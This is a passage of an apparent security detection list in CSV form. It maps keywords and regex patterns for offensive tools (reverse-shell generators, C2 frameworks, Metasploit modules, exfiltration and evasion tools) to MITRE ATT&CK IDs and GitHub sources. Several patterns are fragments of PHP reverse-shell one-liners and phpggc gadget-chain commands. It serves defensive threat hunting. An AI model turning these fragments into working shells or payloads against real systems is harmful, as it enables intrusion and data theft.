T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*phoneinfoga scan -n *",".{0,1000}phoneinfoga\sscan\s\-n\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*PhoneInfoga*",".{0,1000}PhoneInfoga.{0,1000}","offensive_tool_keyword","PhoneInfoga","An OSINT framework for phone numbers.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Information Gathering","https://github.com/sundowndev/PhoneInfoga","1","0","N/A","N/A","10","11992","3293","2024-04-28T20:01:04Z","2018-10-25T09:19:47Z" "*photon.py -u * -l 3 -t 100 --wayback*",".{0,1000}photon\.py\s\-u\s.{0,1000}\s\-l\s3\s\-t\s100\s\-\-wayback.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*php -f *.php -- -o myShell.php*",".{0,1000}php\s\-f\s.{0,1000}\.php\s\-\-\s\-o\smyShell\.php.{0,1000}","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. 
All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2329","742","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" "*PHP Meterpreter Stageless Reverse TCP*",".{0,1000}PHP\sMeterpreter\sStageless\sReverse\sTCP.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s*",".{0,1000}php\s\-r\s\'\$s\=socket_create\(AF_INET,SOCK_STREAM,SOL_TCP\)\;socket_bind\(\$s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*php -r '$sock=fsockopen(*,*);exec(""sh *",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}\)\;exec\(\""sh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*php -r '$sock=fsockopen(*,*);passthru(""sh ",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}\)\;passthru\(\""sh\s","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*php -r '$sock=fsockopen(*,*);popen(""sh 
*",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}\)\;popen\(\""sh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*php -r '$sock=fsockopen(*,*);shell_exec(""sh *",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}\)\;shell_exec\(\""sh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*php -r '$sock=fsockopen(*,*);system(""sh *",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}\)\;system\(\""sh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*php -r '$sock=fsockopen(*,*proc_open(""sh"",*",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}proc_open\(\""sh\"",.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*php -S 0.0.0.0:9056 &*",".{0,1000}php\s\-S\s0\.0\.0\.0\:9056\s\&.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and 
Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*php/meterpreter_reverse_tcp*",".{0,1000}php\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*php/reverse_php*",".{0,1000}php\/reverse_php.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*php_filter_chain_generator --chain *php system*'cmd']*",".{0,1000}php_filter_chain_generator\s\-\-chain\s.{0,1000}php\ssystem.{0,1000}\'cmd\'\].{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*php_passthru_reverse_tcp.py*",".{0,1000}php_passthru_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*php_popen_reverse_tcp.py*",".{0,1000}php_popen_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*php_proc_open_reverse_tcp.py*",".{0,1000}php_proc_open_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*PHP-Code-injection.*",".{0,1000}PHP\-Code\-injection\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*PHP-Code-Injections-Payloads.*",".{0,1000}PHP\-Code\-Injections\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*phpggc -l*",".{0,1000}phpggc\s\-l.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*phpggc monolog/rce1 assert 'phpinfo()'*",".{0,1000}phpggc\smonolog\/rce1\sassert\s\'phpinfo\(\)\'.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - 
T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*phpggc symfony/rce1 id*",".{0,1000}phpggc\ssymfony\/rce1\sid.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*phpmyadmin_credsteal.*",".{0,1000}phpmyadmin_credsteal\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*PHPRedirector*AutoOAuthFlow.py*",".{0,1000}PHPRedirector.{0,1000}AutoOAuthFlow\.py.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*php-reverse-shell.php*",".{0,1000}php\-reverse\-shell\.php.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*PhpSploit*",".{0,1000}PhpSploit.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1059 - T1102 - T1053 - T1216 - T1027","TA0002 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","1","N/A","10","10","2138","433","2024-03-29T15:37:17Z","2014-05-21T19:43:03Z" "*phra/Pezor*",".{0,1000}phra\/Pezor.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" 
"*phra/Pezor/*",".{0,1000}phra\/Pezor\/.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*phuip-fpizdam*",".{0,1000}phuip\-fpizdam.{0,1000}","offensive_tool_keyword","phuip-fpizdam","This is an exploit for a bug in php-fpm (CVE-2019-11043). In certain nginx + php-fpm configurations. the bug is possible to trigger from the outside. This means that a web user may get code execution if you have vulnerable config (see below).","T1190 - T1191 - T1192 - T1210 - T1059","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/neex/phuip-fpizdam","1","1","N/A","N/A","10","1783","247","2019-11-12T18:53:14Z","2019-09-23T21:37:27Z" "*piata_ssh_userpass.txt*",".{0,1000}piata_ssh_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*PIC-Exec*runshellcode.asm*",".{0,1000}PIC\-Exec.{0,1000}runshellcode\.asm.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*PIC-Exec\addresshunter*",".{0,1000}PIC\-Exec\\addresshunter.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*PIC-Get-Privileges*",".{0,1000}PIC\-Get\-Privileges.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - 
T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*PickleC2-main*",".{0,1000}PickleC2\-main.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","1","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*-PID * -Assembly * -Arguments *",".{0,1000}\-PID\s.{0,1000}\s\-Assembly\s.{0,1000}\s\-Arguments\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*pingcastle*",".{0,1000}pingcastle.{0,1000}","offensive_tool_keyword","pingcastle","active directory weakness scan","T1018 - T1046 - T1069 - T1087 - T1136 - T1482 - T1526 - T1597","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://www.pingcastle.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*PingCastle.cs*",".{0,1000}PingCastle\.cs.{0,1000}","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation 
tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*PingCastle.exe*",".{0,1000}PingCastle\.exe.{0,1000}","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*PingRAT.exe*",".{0,1000}PingRAT\.exe.{0,1000}","offensive_tool_keyword","PingRAT","secretly passes Command and Control (C2) traffic through firewalls using ICMP payloads","T1071.004 - T1573.001","TA0005 - TA0011 - TA0042","N/A","N/A","C2","https://github.com/umutcamliyurt/PingRAT","1","1","N/A","10","10","82","12","2023-09-29T22:26:15Z","2023-09-29T22:07:46Z" "*ping-sweep*",".{0,1000}ping\-sweep.{0,1000}","offensive_tool_keyword","ping-sweep","Wrapper around the ping utility included by the OS. 
used for recon activities","T1016 - T1046","TA0007","N/A","N/A","Information Gathering","https://github.com/libresec/ping-sweep","1","0","N/A","N/A","1","1","0","2016-08-22T15:16:01Z","2016-08-22T02:07:46Z" "*PinoyWH1Z/AoratosWin*",".{0,1000}PinoyWH1Z\/AoratosWin.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*pip install coercer*",".{0,1000}pip\sinstall\scoercer.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*pip install dnschef*",".{0,1000}pip\sinstall\sdnschef.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*pip install exegol*",".{0,1000}pip\sinstall\sexegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pip install hiphp*",".{0,1000}pip\sinstall\shiphp.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*pip install rarce*",".{0,1000}pip\sinstall\srarce.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*pip install --user fee",".{0,1000}pip\sinstall\s\-\-user\sfee","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","356","39","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*pip install --user PyExfil*",".{0,1000}pip\sinstall\s\-\-user\sPyExfil.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pip uninstall autorecon*",".{0,1000}pip\suninstall\sautorecon.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*pip3 install 
bofhound*",".{0,1000}pip3\sinstall\sbofhound.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*pip3 install pypykatz*",".{0,1000}pip3\sinstall\spypykatz.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*pip3 install -U pacu*",".{0,1000}pip3\sinstall\s\-U\spacu.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*'pipename_stager'*",".{0,1000}\'pipename_stager\'.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*PipeViewer.csproj*",".{0,1000}PipeViewer\.csproj.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*PipeViewer_v1.1.zip*",".{0,1000}PipeViewer_v1\.1\.zip.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*PipeViewer-main*",".{0,1000}PipeViewer\-main.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - 